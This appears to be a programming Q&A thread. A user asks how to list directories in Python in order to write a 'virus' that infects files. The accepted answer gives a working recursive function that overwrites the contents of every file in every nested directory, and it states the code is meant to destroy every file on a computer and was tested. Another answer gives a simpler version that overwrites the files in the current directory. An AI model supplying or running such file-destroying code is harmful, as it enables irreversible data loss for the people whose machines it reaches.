# Listing Directories In Python Multi Line

Tags: python, directory

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.

```
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
```

EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.

I don't want to use the ls command cause I want it to be multi-platform.

Comment: what are you trying to do here?

Comment: what is the question? `os.listdir(directory)` will return a list of everything in the directory

Comment: so your virus is going to go into potentially every file in a computer. You might want to write a more recursive code so it doesn't get stopped at a directory if you are writing your virus into the individual files

Answer (score 0, accepted):

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.

```
def virus(directory=os.getcwd()):
    VIRUS = "THIS FILE IS NOW INFECTED" 
    if directory[-1] == "/": #making sure directory can be concencated with file
        pass
    else:
        directory = directory + "/" #making sure directory can be concencated with file
    files = os.listdir(directory)
    for i in files:
        location = directory + i
        if os.path.isfile(location):
            with open(location,'w') as f:
                f.write(VIRUS)
        elif os.path.isdir(location):
            virus(directory=location) #running function again if in a directory to go inside those files
```

Now this one line will rewrite all files as the message in the variable `VIRUS`:

virus()

**Extra explanation:**

the reason I have the default as: `directory=os.getcwd()` is because you originally were using `"."`, which, in the `listdir` method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories

**This does work!**:

I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: `"THIS FILE IS NOW INFECTED"`

Answer (score 1):

Don't call `str` on the result of `os.listdir` if you're just going to try to parse it again. Instead, use the result directly:

```
for item in os.listdir('.'):
    print item   # or do something else with item
```

Answer (score 0):

Something  like this:

```
import os
VIRUS = "some text"
data = os.listdir(".")  #returns a list of files and directories

for x in data:       #iterate over the list

    if os.path.isfile(x): #if current item is a file then perform write operation

        #use `with` statement for handling files, it automatically closes the file
        with open(x,'w') as f:
            f.write(VIRUS)
```